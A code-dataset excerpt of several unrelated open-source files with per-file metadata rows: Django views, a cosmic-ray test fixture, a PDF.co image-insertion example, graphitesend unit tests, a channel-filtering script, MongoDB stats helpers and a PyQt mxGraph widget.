policy=policy).order_by('display_order')
length = len(operation) + 1
form = OperationForm() # A empty, unbound form
return render(request, 'policies/show.html',
{'policy': policy,
'form': form,
'operation': operation, 'length': length})
def rename(request):
if request.method == 'POST':
old_name = request.POST['old_name']
new_name = request.POST['new_name']
new_name = replace_letters(new_name)
policy = Policy.objects.get(
policy_name=old_name)
processes = Process.objects.filter(policy_name=old_name)
for process in processes:
process.policy_name = new_name
process.save()
policy.policy_name = new_name
policy.save()
return HttpResponseRedirect(reverse('policies:show',
kwargs={'policy_id': policy.id}))
def results(request, policy_id):
response = "result of policies %s."
return HttpResponse(response % policy_id)
def detail(request, policy_id):
try:
operation = Operation.objects.get(pk=operation_id)
except Operation.DoesNotExist:
raise Http404("Operation does not exist")
return render(request, 'policies/detail.html', {'operation': operation})
|
mit
| -2,504,476,941,914,115,600
| 35.178344
| 79
| 0.617077
| false
| 4.126408
| false
| false
| false
|
sixty-north/cosmic-ray
|
tests/resources/example_project/adam/adam_1.py
|
1
|
1178
|
"""adam.adam_1
"""
# pylint: disable=C0111
import operator
from math import * # noqa: F401,F403
# Add mutation points for comparison operators.
def constant_number():
return 42
def constant_true():
return True
def constant_false():
return False
def bool_and():
return object() and None
def bool_or():
return object() or None
def bool_expr_with_not():
return not object()
def bool_if():
if object():
return True
raise Exception("bool_if() failed")
def if_expression():
return True if object() else None
def assert_in_func():
assert object()
return True
def unary_sub():
return -1
def unary_add():
return +1
def binary_add():
return 5 + 6
def equals(vals):
def constraint(x, y):
return operator.xor(x == y, x != y)
return all([constraint(x, y) for x in vals for y in vals])
def use_break(limit):
for x in range(limit):
break
return x
def use_continue(limit):
for x in range(limit):
continue
return x
def use_star_args(*args):
pass
def use_extended_call_syntax(x):
use_star_args(*x)
def use_star_expr(x):
a, *b = x
|
mit
| 6,149,737,179,712,978,000
| 11.804348
| 62
| 0.611205
| false
| 3.346591
| false
| false
| false
|
bytescout/ByteScout-SDK-SourceCode
|
PDF.co Web API/Add Text And Images To PDF/Python/Add Image by finding target coordinates/AddImageByFindingTargetCoordinates.py
|
1
|
3639
|
import os
import requests # pip install requests
# The authentication key (API Key).
# Get your own by registering at https://app.pdf.co/documentation/api
API_KEY = "**************************************"
# Base URL for PDF.co Web API requests
BASE_URL = "https://api.pdf.co/v1"
# Direct URL of source PDF file.
SourceFileUrl = "https://bytescout-com.s3.amazonaws.com/files/demo-files/cloud-api/pdf-edit/sample.pdf"
# Search string.
SearchString = 'Your Company Name'
# Comma-separated list of page indices (or ranges) to process. Leave empty for all pages. Example: '0,2-5,7-'.
Pages = ""
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination PDF file name
DestinationFile = ".//result.pdf"
# Image params
Type = "image"
Width = 119
Height = 32
ImageUrl = "https://bytescout-com.s3.amazonaws.com/files/demo-files/cloud-api/pdf-edit/logo.png"
def main(args = None):
# First of all try to find Text within input PDF file
res = findTextWithinPDF(SourceFileUrl, SearchString)
if res:
addImageToPDF(DestinationFile, res['top'], res['left'])
else:
print("No result found!")
def findTextWithinPDF(sourceFile, searchText):
# Prepare URL for PDF text search API call
# See documentation: https://app.pdf.co/documentation/api/1.0/pdf/find.html
retVal = dict()
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["url"] = sourceFile
parameters["searchString"] = searchText
url = "{}/pdf/find".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={"x-api-key": API_KEY})
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# print(json)
if json["body"]:
retVal['top'] = json["body"][0]['top']
retVal['left'] = json["body"][0]['left']
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return retVal
def addImageToPDF(destinationFile, top, left):
"""Add image using PDF.co Web API"""
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["name"] = os.path.basename(destinationFile)
parameters["password"] = Password
parameters["pages"] = Pages
parameters["url"] = SourceFileUrl
parameters["type"] = Type
parameters["x"] = top + 300
parameters["y"] = left
parameters["width"] = Width
parameters["height"] = Height
parameters["urlimage"] = ImageUrl
# Prepare URL for 'PDF Edit' API request
url = "{}/pdf/edit/add".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={"x-api-key": API_KEY})
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Get URL of result file
resultFileUrl = json["url"]
# Download result file
r = requests.get(resultFileUrl, stream=True)
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
if __name__ == '__main__':
main()
|
apache-2.0
| 3,477,542,829,167,449,600
| 29.082645
| 110
| 0.623523
| false
| 3.814465
| false
| false
| false
|
numberly/graphitesend
|
tests/test_all.py
|
1
|
10724
|
#!/usr/bin/env python
from graphitesend import graphitesend
import unittest
import socket
import os
class TestAll(unittest.TestCase):
""" Basic tests ( better than nothing ) """
def setUp(self):
""" reset graphitesend """
# Drop any connections or modules that have been setup from other tests
graphitesend.reset()
# Monkeypatch the graphitesend so that it points at a graphite service
# running on one of my (dannyla@linux.com) systems.
# graphitesend.default_graphite_server = 'graphite.dansysadm.com'
graphitesend.default_graphite_server = 'localhost'
self.hostname = os.uname()[1]
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind(('localhost', 2003))
self.server.listen(5)
def tearDown(self):
""" reset graphitesend """
# Drop any connections or modules that have been setup from other tests
graphitesend.reset()
try:
self.server.shutdown(socket.SHUT_RD)
self.server.close()
except Exception:
pass
self.server = None
def test_connect_exception_on_badhost(self):
bad_graphite_server = 'missinggraphiteserver.example.com'
graphitesend.default_graphite_server = bad_graphite_server
with self.assertRaises(graphitesend.GraphiteSendException):
graphitesend.init()
def test_set_lowercase_metric_names(self):
g = graphitesend.init(lowercase_metric_names=True)
self.assertEqual(g.lowercase_metric_names, True)
def test_lowercase_metric_names(self):
g = graphitesend.init(lowercase_metric_names=True)
send_data = g.send('METRIC', 1)
self.assertEqual('metric' in send_data, True)
self.assertEqual('METRIC' in send_data, False)
def test_create_graphitesend_instance(self):
g = graphitesend.init()
expected_type = type(graphitesend.GraphiteClient())
g_type = type(g)
self.assertEqual(g_type, expected_type)
def test_monkey_patch_of_graphitehost(self):
g = graphitesend.init()
custom_prefix = g.addr[0]
self.assertEqual(custom_prefix, 'localhost')
def test_fqdn_squash(self):
g = graphitesend.init(fqdn_squash=True)
custom_prefix = g.prefix
expected_results = 'systems.%s.' % self.hostname.replace('.', '_')
self.assertEqual(custom_prefix, expected_results)
def test_noprefix(self):
g = graphitesend.init()
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'systems.%s.' % self.hostname)
def test_system_name(self):
g = graphitesend.init(system_name='remote_host')
custom_prefix = g.prefix
expected_prefix = 'systems.remote_host.'
self.assertEqual(custom_prefix, expected_prefix)
def test_empty_system_name(self):
g = graphitesend.init(system_name='')
custom_prefix = g.prefix
expected_prefix = 'systems.'
self.assertEqual(custom_prefix, expected_prefix)
def test_no_system_name(self):
g = graphitesend.init(group='foo')
custom_prefix = g.prefix
expected_prefix = 'systems.%s.foo.' % self.hostname
self.assertEqual(custom_prefix, expected_prefix)
def test_prefix(self):
g = graphitesend.init(prefix='custom_prefix')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_prefix_double_dot(self):
g = graphitesend.init(prefix='custom_prefix.')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_prefix_remove_spaces(self):
g = graphitesend.init(prefix='custom prefix')
custom_prefix = g.prefix
self.assertEqual(custom_prefix, 'custom_prefix.%s.' % self.hostname)
def test_set_prefix_group(self):
g = graphitesend.init(prefix='prefix', group='group')
custom_prefix = g.prefix
expected_prefix = 'prefix.%s.group.' % self.hostname
self.assertEqual(custom_prefix, expected_prefix)
def test_set_prefix_group_system(self):
g = graphitesend.init(prefix='prefix', system_name='system',
group='group')
custom_prefix = g.prefix
expected_prefix = 'prefix.system.group.'
self.assertEqual(custom_prefix, expected_prefix)
def test_set_suffix(self):
g = graphitesend.init(suffix='custom_suffix')
custom_suffix = g.suffix
self.assertEqual(custom_suffix, 'custom_suffix')
def test_set_group_prefix(self):
g = graphitesend.init(group='custom_group')
expected_prefix = "systems.%s.custom_group." % self.hostname
custom_prefix = g.prefix
self.assertEqual(custom_prefix, expected_prefix)
def test_default_prefix(self):
g = graphitesend.init()
expected_prefix = "systems.%s." % self.hostname
custom_prefix = g.prefix
self.assertEqual(custom_prefix, expected_prefix)
def test_leave_suffix(self):
g = graphitesend.init()
default_suffix = g.suffix
self.assertEqual(default_suffix, '')
def test_clean_metric(self):
g = graphitesend.init()
#
metric_name = g.clean_metric_name('test(name)')
self.assertEqual(metric_name, 'test_name')
#
metric_name = g.clean_metric_name('test name')
self.assertEqual(metric_name, 'test_name')
#
metric_name = g.clean_metric_name('test name')
self.assertEqual(metric_name, 'test__name')
def test_reset(self):
graphitesend.init()
graphitesend.reset()
graphite_instance = graphitesend._module_instance
self.assertEqual(graphite_instance, None)
def test_force_failure_on_send(self):
graphite_instance = graphitesend.init()
graphite_instance.disconnect()
with self.assertRaises(graphitesend.GraphiteSendException):
graphite_instance.send('metric', 0)
def test_force_unknown_failure_on_send(self):
graphite_instance = graphitesend.init()
graphite_instance.socket = None
with self.assertRaises(graphitesend.GraphiteSendException):
graphite_instance.send('metric', 0)
def test_send_list_metric_value(self):
graphite_instance = graphitesend.init(prefix='test', system_name='local')
response = graphite_instance.send_list([('metric', 1)])
self.assertEqual('long message: test.local.metric 1' in response, True)
self.assertEqual('1.00000' in response, True)
def test_send_list_metric_value_single_timestamp(self):
# Make sure it can handle custom timestamp
graphite_instance = graphitesend.init(prefix='test')
response = graphite_instance.send_list([('metric', 1)], timestamp=1)
# self.assertEqual('sent 23 long message: test.metric' in response,
# True)
self.assertEqual('1.00000' in response, True)
self.assertEqual(response.endswith('1\n'), True)
def test_send_list_metric_value_timestamp(self):
graphite_instance = graphitesend.init(prefix='test')
# Make sure it can handle custom timestamp
response = graphite_instance.send_list([('metric', 1, 1)])
# self.assertEqual('sent 23 long message: test.metric' in response,
# True)
self.assertEqual('1.00000' in response, True)
self.assertEqual(response.endswith('1\n'), True)
def test_send_list_metric_value_timestamp_2(self):
graphite_instance = graphitesend.init(prefix='test', system_name='')
# Make sure it can handle custom timestamp
response = graphite_instance.send_list(
[('metric', 1, 1), ('metric', 1, 2)])
# self.assertEqual('sent 46 long message:' in response, True)
self.assertEqual('test.metric 1.000000 1' in response, True)
self.assertEqual('test.metric 1.000000 2' in response, True)
def test_send_list_metric_value_timestamp_3(self):
graphite_instance = graphitesend.init(prefix='test', system_name='')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
response = graphite_instance.send_list(
[
('metric', 1, 1),
('metric', 2),
]
)
# self.assertEqual('sent 46 long message:' in response, True)
self.assertEqual('test.metric 1.000000 1' in response, True)
self.assertEqual('test.metric 2.000000 2' not in response, True)
def test_send_list_metric_value_timestamp_default(self):
graphite_instance = graphitesend.init(prefix='test', system_name='bar')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
response = graphite_instance.send_list(
[
('metric', 1, 1),
('metric', 2),
],
timestamp='4'
)
# self.assertEqual('sent 69 long message:' in response, True)
self.assertEqual('test.bar.metric 1.000000 1' in response, True)
self.assertEqual('test.bar.metric 2.000000 4' in response, True)
def test_send_list_metric_value_timestamp_default_2(self):
graphite_instance = graphitesend.init(prefix='test', system_name='foo')
# Make sure it can handle custom timestamp, fill in the missing with
# the current time.
(c, addr) = self.server.accept()
response = graphite_instance.send_list(
[
('metric', 1),
('metric', 2, 2),
],
timestamp='4'
)
# self.assertEqual('sent 69 long message:' in response, True)
self.assertEqual('test.foo.metric 1.000000 4' in response, True)
self.assertEqual('test.foo.metric 2.000000 2' in response, True)
sent_on_socket = c.recv(69)
self.assertEqual('test.foo.metric 1.000000 4' in sent_on_socket, True)
self.assertEqual('test.foo.metric 2.000000 2' in sent_on_socket, True)
# self.server.shutdown(socket.SHUT_RD)
# self.server.close()
def test_send_value_as_string(self):
# Make sure it can handle custom timestamp
graphite_instance = graphitesend.init(prefix='')
response = graphite_instance.send("metric", "1", "1")
self.assertEqual('1.00000' in response, True)
print response
self.assertEqual(response.endswith('1\n'), True)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
| -6,224,074,902,658,010,000
| 39.014925
| 81
| 0.631854
| false
| 3.875678
| true
| false
| false
|
reedessick/pointy-Poisson
|
stripRawUnsafe.py
|
1
|
1801
|
#!/usr/bin/python
usage = "stripRawUnsafe.py unsafe.txt interesting.txt"
description = "reads in a list of unsafe channels from unsafe.txt. If these are not \"raw\" channel names, it converts them to that form. I then reads in a channel list from interesting.txt and performs a filter based on the unsafe channels. Channels not flagged as unsafe are printed to stdout while channels flagged as unsafe are printed to stderr"
author = "reed.essick@ligo.org"
import sys
from collections import defaultdict
from optparse import OptionParser
#-------------------------------------------------
parser = OptionParser(usage=usage, description=description)
opts, args = parser.parse_args()
if len(args)!=2:
raise ValueError("Please supply exactly 2 input arguments\n%s"%(usage))
unsafe, interesting = args
#-------------------------------------------------
### read in unsafe channel list
file_obj = open(unsafe, "r")
unsafe_chans = defaultdict( set() )
for chan in file_obj:
chan = chan.strip()
if chan[2] == "-": ### interpret at KW channel name -> convert!
chan = chan.split("_")
ifo, chan = chan[0], "%s"%("_".join(chan[1:-2]))
else:
ifo, chan = chan.split(":")
unsafe_chans[ifo].add( chan )
file_obj.close()
#-------------------------------------------------
### read in interesting channel list and parse
file_obj = open(interesting, "r")
for channel in file_obj:
channel = channel.strip()
chan = channel
if chan[2] == "-": ### interpret at KW channel name -> convert!
chan = chan.split("_")
ifo, chan = chan[0], "%s"%("_".join(chan[1:-2]))
else:
ifo, chan = chan.split(":")
if chan in unsafe_chans[ifo]:
print >> sys.stderr, channel
else:
print >> sys.stdout, channel
file_obj.close()
|
mit
| -4,477,093,486,662,943,000
| 33.634615
| 350
| 0.60633
| false
| 3.848291
| false
| false
| false
|
terasaur/tstracker
|
mqclient/src/tstracker/stats_db.py
|
1
|
2493
|
#
# Copyright 2012 ibiblio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import terasaur.db.mongodb_db as mongodb_db
import pymongo
from datetime import datetime
import pytz
"""
Functions for storing and retrieving torrent statistics data. See
torrent_stats module for details about data model.
"""
STATS_CONTROL_COLLECTION = 'stats_control'
STATS_DATA_MINUTE = 'stats_minute'
STATS_DATA_HOUR = 'stats_hour'
STATS_DATA_DAY = 'stats_day'
def get_control_value(key):
result = mongodb_db.get(STATS_CONTROL_COLLECTION, {'_id': key})
if result:
return result['v']
else:
return None
def set_control_value(key, value):
query = {'_id': key}
data = {"$set": {'v': value}}
mongodb_db.update(STATS_CONTROL_COLLECTION, query, data)
def get_conn():
return mongodb_db.get_db_conn()
def get_minute_stats(torrent):
return _get_stats(STATS_DATA_MINUTE, torrent)
def get_hour_stats(torrent):
return _get_stats(STATS_DATA_HOUR, torrent)
def get_day_stats(torrent):
return _get_stats(STATS_DATA_DAY, torrent)
def _get_stats(timeframe, torrent):
conn = get_conn()
db = conn[mongodb_db.DB_PARAMS['db_name']]
res = db[timeframe].find({'ih':torrent.info_hash}).sort('ih')
return res
def initialize():
conn = mongodb_db.get_db_conn()
db = conn[mongodb_db.DB_PARAMS['db_name']]
# info hash index
db[STATS_DATA_MINUTE].ensure_index('info_hash')
db[STATS_DATA_HOUR].ensure_index('info_hash')
db[STATS_DATA_DAY].ensure_index('info_hash')
# control keys
_initialize_date(db, 'last_incremental')
_initialize_date(db, 'last_capture_minute')
_initialize_date(db, 'last_capture_hour')
_initialize_date(db, 'last_capture_day')
conn.end_request()
def _initialize_date(db, key):
value = get_control_value(key)
if value is None:
zero_date = datetime(1970, 1, 1, 0, 0, 0, 0, pytz.utc)
data = {'_id': key, 'v': zero_date}
db[STATS_CONTROL_COLLECTION].save(data)
|
apache-2.0
| 6,713,933,945,272,915,000
| 29.777778
| 74
| 0.686723
| false
| 3.280263
| false
| false
| false
|
ESSS/qmxgraph
|
qmxgraph/widget.py
|
1
|
23408
|
from __future__ import absolute_import
import json
import os
import weakref
from PyQt5.QtCore import QDataStream, QIODevice, QObject, Qt, pyqtSignal
from PyQt5.QtGui import QPainter
from PyQt5.QtWidgets import QDialog, QGridLayout, QShortcut, QSizePolicy, \
QWidget, QStyleOption, QStyle
from qmxgraph import constants, render
from qmxgraph.api import QmxGraphApi
from qmxgraph.configuration import GraphOptions, GraphStyles
from ._web_view import QWebViewWithDragDrop
# Some ugliness to successfully build the doc on ReadTheDocs...
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if not on_rtd:
from qmxgraph import resource_mxgraph, resource_qmxgraph # noqa
class QmxGraph(QWidget):
"""
A graph widget that is actually an web view using as backend mxGraph_,
a very feature rich JS graph library which is also used as backend to
the powerful Google Drive's draw.io widget.
**Tags**
Tags don't have any impact or influence on QmxGraph features. It is just a
feature so client code can associate custom data with cells created in a
graph.
Tags can be helpful, for instance, to be able to infer an
application-specific type of a dragged & dropped new cell. When added cell
events are handled, client code can just query tags to know this
information. Without tags, it would need to infer based on unreliable
heuristics like current style or label.
An important observation is that tag values are *always* strings. If a
value of other type is used it will raise an error.
**Debug/Inspection**
It is possible to open a web inspector for underlying graph drawing page by
typing `F12` with widget focused.
.. _mxGraph: https://jgraph.github.io/mxgraph/
"""
# Signal fired when underlying web view finishes loading. Argument
# indicates if loaded successfully.
loadFinished = pyqtSignal(bool)
def __init__(
self,
options=None,
styles=None,
stencils=tuple(),
auto_load=True,
parent=None,
):
"""
:param qmxgraph.configuration.GraphOptions|None options: Features
enabled in graph drawing widget. If none given, uses defaults.
:param qmxgraph.configuration.GraphStyles|None styles: Additional
styles made available for graph drawing widget besides mxGraph's
default ones. If none given only mxGraph defaults are available.
:param iterable[str] stencils: A sequence of XMLs available in Qt
resource collections. Each XML must respect format defined by
mxGraph (see
https://jgraph.github.io/mxgraph/docs/js-api/files/shape/mxStencil-js.html#mxStencil
and
https://jgraph.github.io/mxgraph/javascript/examples/stencils.xml
for reference).
:param bool auto_load: If should load page as soon as widget is
initialized.
:param QWidget|None parent: Parent widget.
"""
QWidget.__init__(self, parent)
self._own_path = ':/qmxgraph'
self._mxgraph_path = ':/mxgraph'
if options is None:
options = GraphOptions()
self._options = options
if styles is None:
styles = GraphStyles(styles={})
self._styles = styles
self._stencils = stencils
# Web view fills whole widget area
self._layout = QGridLayout(self)
self._layout.setContentsMargins(0, 0, 0, 0) # no margin to web view
self._web_view = QWebViewWithDragDrop()
self._web_view.setSizePolicy(
QSizePolicy.Expanding, QSizePolicy.Expanding)
# Starts disabled, only enable once finished loading page (as user
# interaction before that would be unsafe)
# TODO: widget remain with disabled appearance even after enabled
# self.setEnabled(False)
self._layout.addWidget(self._web_view, 0, 0, 1, 1)
self._error_bridge = None
self._events_bridge = None
self._drag_drop_handler = None
# Similar to a browser, QmxGraph widget is going to allow inspection by
# typing F12
self._inspector_dialog = None
inspector_shortcut = QShortcut(self)
inspector_shortcut.setKey("F12")
inspector_shortcut.activated.connect(self.toggle_inspector)
self._execute_on_load_finished()
self._api = QmxGraphApi(graph=self)
self._web_view.on_drag_enter_event.connect(self._on_drag_enter)
self._web_view.on_drag_move_event.connect(self._on_drag_move)
self._web_view.on_drop_event.connect(self._on_drop)
self._double_click_bridge = _DoubleClickBridge()
self._popup_menu_bridge = _PopupMenuBridge()
if auto_load:
self._load_graph_page()
def paintEvent(self, paint_event):
"""
A simple override to the `QWidget.paintEvent` required soo the QSS
rules have effect over `QWidget` subclasses.
From: http://doc.qt.io/qt-5/stylesheet-reference.html#qwidget-widget
:type paint_event: PyQt5.QtGui.QPaintEvent
"""
opt = QStyleOption()
opt.initFrom(self)
p = QPainter(self)
self.style().drawPrimitive(QStyle.PE_Widget, opt, p, self)
def load(self):
"""
Load graph drawing page, if not yet loaded.
"""
if not self.is_loaded() or not self._web_view.is_loading():
self._load_graph_page()
def is_loaded(self):
"""
:rtype: bool
:return: Is graph page already loaded?
"""
# If failed in initialization of graph and it isn't running do not
# considered it loaded, as graph and its API aren't safe for use
return self._web_view.is_loaded() and \
self._web_view.eval_js('graphs.isRunning()')
def blank(self):
"""
Blanks the graph drawing page, effectively clearing/unloading currently
displayed graph.
"""
if self._inspector_dialog:
self._inspector_dialog.close()
self._inspector_dialog = None
self._web_view.blank()
def set_error_bridge(self, bridge):
"""
Redirects errors on JavaScript code from graph drawing widget to
bridge.
:param ErrorHandlingBridge bridge: Handler for errors.
"""
self._error_bridge = bridge
if self.is_loaded():
self._web_view.add_to_js_window('bridge_error_handler', bridge)
def set_events_bridge(self, bridge):
"""
Redirects events fired by graph on JavaScript code to Python/Qt side
by using a bridge.
:param EventsBridge bridge: Bridge with event handlers.
"""
self._events_bridge = bridge
if self.is_loaded():
self._web_view.add_to_js_window('bridge_events_handler', bridge)
# Bind all known Python/Qt event handlers to JavaScript events
self.api.on_cells_added('bridge_events_handler.on_cells_added')
self.api.on_cells_removed('bridge_events_handler.on_cells_removed')
self.api.on_label_changed('bridge_events_handler.on_label_changed')
self.api.on_selection_changed(
'bridge_events_handler.on_selection_changed')
self.api.on_terminal_changed(
'bridge_events_handler.on_terminal_changed')
self.api.on_terminal_with_port_changed(
'bridge_events_handler.on_terminal_with_port_changed')
self.api.on_view_update(
'bridge_events_handler.on_view_update')
self.api.on_cells_bounds_changed(
'bridge_events_handler.on_cells_bounds_changed')
def set_double_click_handler(self, handler):
"""
Set the handler used for double click in cells of graph.
Unlike other event handlers, double click is exclusive to a single
handler. This follows underlying mxGraph implementation that works in
this manner, with the likely intention of enforcing a single
side-effect happening when a cell is double clicked.
:param callable|None handler: Handler that receives double clicked
cell id as only argument. If None it disconnects double click
handler from graph.
"""
self._set_private_bridge_handler(
self._double_click_bridge.on_double_click,
handler=handler,
setter=self._set_double_click_bridge,
)
def set_popup_menu_handler(self, handler):
"""
Set the handler used for popup menu (i.e. right-click) in cells of
graph.
Unlike other event handlers, popup menu is exclusive to a single
handler. This follows underlying mxGraph implementation that works in
this manner, with the likely intention of enforcing a single
side-effect happening when a cell is right-clicked.
:param callable|None handler: Handler that receives, respectively, id
of cell that was right-clicked, X coordinate in screen coordinates
and Y coordinate in screen coordinates as its three arguments. If
None it disconnects handler from graph.
"""
self._set_private_bridge_handler(
self._popup_menu_bridge.on_popup_menu,
handler=handler,
setter=self._set_popup_menu_bridge,
)
@property
def api(self):
"""
:rtype: qmxgraph.api.QmxGraphApi
:return: Proxy to API to manipulate graph.
"""
return self._api
# Web inspector -----------------------------------------------------------
def show_inspector(self):
"""
Show web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog:
from PyQt5.QtWebKit import QWebSettings
QWebSettings.globalSettings().setAttribute(
QWebSettings.DeveloperExtrasEnabled, True)
dialog = self._inspector_dialog = QDialog(self)
dialog.setWindowTitle("Web Inspector")
dialog.setWindowFlags(
dialog.windowFlags() | Qt.WindowMaximizeButtonHint)
dialog.resize(800, 600)
layout = QGridLayout(dialog)
layout.setContentsMargins(0, 0, 0, 0) # no margin to web view
from PyQt5.QtWebKitWidgets import QWebInspector
inspector = QWebInspector(dialog)
inspector.setSizePolicy(
QSizePolicy.Expanding, QSizePolicy.Expanding)
inspector.setPage(self.inner_web_view().page())
inspector.setVisible(True)
layout.addWidget(inspector)
self._inspector_dialog.show()
def hide_inspector(self):
"""
Hide web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog:
return
self._inspector_dialog.hide()
def toggle_inspector(self):
"""
Toggle visibility state of web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog or \
not self._inspector_dialog.isVisible():
self.show_inspector()
else:
self.hide_inspector()
# Accessors recommended for debugging/testing only ------------------------
def inner_web_view(self):
"""
:rtype: QWebViewWithDragDrop
:return: Web view widget showing graph drawing page.
"""
return self._web_view
# Overridden events -------------------------------------------------------
def resizeEvent(self, event):
if self.is_loaded():
# Whenever graph widget is resized, it is going to resize
# underlying graph in JS to fit widget as well as possible.
width = event.size().width()
height = event.size().height()
self.api.resize_container(width, height)
event.ignore()
# Protected plumbing methods ----------------------------------------------
def _load_graph_page(self):
"""
Loads the graph drawing page in Qt's web view widget.
"""
mxgraph_path = self._mxgraph_path
own_path = self._own_path
html = render.render_embedded_html(
options=self._options,
styles=self._styles,
stencils=self._stencils,
mxgraph_path=mxgraph_path,
own_path=own_path,
)
from PyQt5.QtCore import QUrl
self._web_view.setHtml(html, baseUrl=QUrl('qrc:/'))
def _execute_on_load_finished(self):
"""
Several actions must be delayed until page finishes loading to take
effect.
"""
self_ref = weakref.ref(self)
def post_load(ok):
self_ = self_ref()
if not self_:
return
if ok:
# TODO: widget remain w/ disabled appearance even after enabled
# Allow user to interact with page again
# self_._web_view.setEnabled(True)
# There is a chance error handler is set before loaded. If so,
# register it on JS once page finishes loading.
if self_._error_bridge:
self_.set_error_bridge(self_._error_bridge)
if self_._events_bridge:
self_.set_events_bridge(self_._events_bridge)
self_._set_double_click_bridge()
self_._set_popup_menu_bridge()
width = self_.width()
height = self_.height()
self_.api.resize_container(width, height)
self_.loadFinished.emit(bool(ok and self_.is_loaded()))
self._web_view.loadFinished.connect(post_load)
def _on_drag_enter(self, event):
"""
:type event: QDragEnterEvent
"""
self._approve_only_dd_mime_type(event)
def _on_drag_move(self, event):
"""
:type event: QDragMoveEvent
"""
self._approve_only_dd_mime_type(event)
def _approve_only_dd_mime_type(self, event):
"""
Only approve events that contain QmxGraph's drag&drop MIME type.
:type event: QDragEnterEvent|QDragMoveEvent
"""
data = event.mimeData().data(constants.QGRAPH_DD_MIME_TYPE)
if not data.isNull():
event.acceptProposedAction()
else:
event.ignore()
def _on_drop(self, event):
"""
Adds to graph contents read from MIME data from drop event.
Note that new vertices are added centered at current mouse position.
:type event: QDropEvent
"""
data = event.mimeData().data(constants.QGRAPH_DD_MIME_TYPE)
if not data.isNull():
data_stream = QDataStream(data, QIODevice.ReadOnly)
parsed = json.loads(data_stream.readString().decode('utf8'))
# Refer to `mime.py` for docs about format
version = parsed['version']
if version not in (1, 2):
raise ValueError(
"Unsupported version of QmxGraph MIME data: {}".format(
version))
x = event.pos().x()
y = event.pos().y()
if version in (1, 2):
vertices = parsed.get('vertices', [])
scale = self.api.get_zoom_scale()
for v in vertices:
# place vertices with an offset so their center falls
# in the event point.
vertex_x = x + (v['dx'] - v['width'] * 0.5) * scale
vertex_y = y + (v['dy'] - v['height'] * 0.5) * scale
self.api.insert_vertex(
x=vertex_x,
y=vertex_y,
width=v['width'],
height=v['height'],
label=v['label'],
style=v.get('style', None),
tags=v.get('tags', {}),
)
if version in (2,):
decorations = parsed.get('decorations', [])
for v in decorations:
self.api.insert_decoration(
x=x,
y=y,
width=v['width'],
height=v['height'],
label=v['label'],
style=v.get('style', None),
tags=v.get('tags', {}),
)
event.acceptProposedAction()
else:
event.ignore()
def _set_double_click_bridge(self):
"""
Redirects double click events fired by graph on JavaScript code to
Python/Qt side by using a private bridge.
"""
if self.is_loaded():
bridge = self._double_click_bridge
self._web_view.add_to_js_window(
'bridge_double_click_handler', bridge)
self.api.set_double_click_handler(
'bridge_double_click_handler.on_double_click')
def _set_popup_menu_bridge(self):
"""
Redirects popup menu (i.e. right click) events fired by graph on
JavaScript code to Python/Qt side by using a private bridge.
"""
if self.is_loaded():
bridge = self._popup_menu_bridge
self._web_view.add_to_js_window(
'bridge_popup_menu_handler', bridge)
self.api.set_popup_menu_handler(
'bridge_popup_menu_handler.on_popup_menu')
def _set_private_bridge_handler(self, bridge_signal, handler, setter):
"""
Helper method to set handler for private bridges like the ones use for
double click and popup menu events.
:param pyqtSignal bridge_signal: A Qt signal in bridge object.
:param callable|None handler: Handler of signal. If None it
disconnects handler from graph.
:param callable setter: Internal setter method used to set bridge in
QmxGraph object, only if already loaded.
"""
try:
bridge_signal.disconnect()
except TypeError:
# It fails if tries to disconnect without any handler connected.
pass
if handler:
bridge_signal.connect(handler)
if self.is_loaded():
setter()
class ErrorHandlingBridge(QObject):
"""
Error handler on JavaScript side will use `on_error` signal to communicate
to Python any error that may'be happened.
Client code must connect to signal and handle messages in whatever manner
desired.
"""
# JavaScript client code emits this signal whenever an error happens
#
# Arguments:
# msg: str
# url: str
# line: int
# column: int
on_error = pyqtSignal(str, str, int, int, name='on_error')
class EventsBridge(QObject):
"""
A bridge object between Python/Qt and JavaScript that provides a series
of signals that are connected to events fired on JavaScript.
:ivar pyqtSignal on_cells_removed: JavaScript client code emits this
signal when cells are removed from graph. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_cells_added: JavaScript client code emits this
signal when cells are added to graph. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_label_changed: JavaScript client code emits this
signal when cell is renamed. Arguments:
- cell_id: str
- new_label: str
- old_label: str
:ivar pyqtSignal on_selection_changed: JavaScript client code emits
this signal when the current selection change. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_terminal_changed: JavaScript client code emits
this signal when a cell terminal change. Arguments:
- cell_id: str
- terminal_type: str
- new_terminal_id: str
- old_terminal_id: str
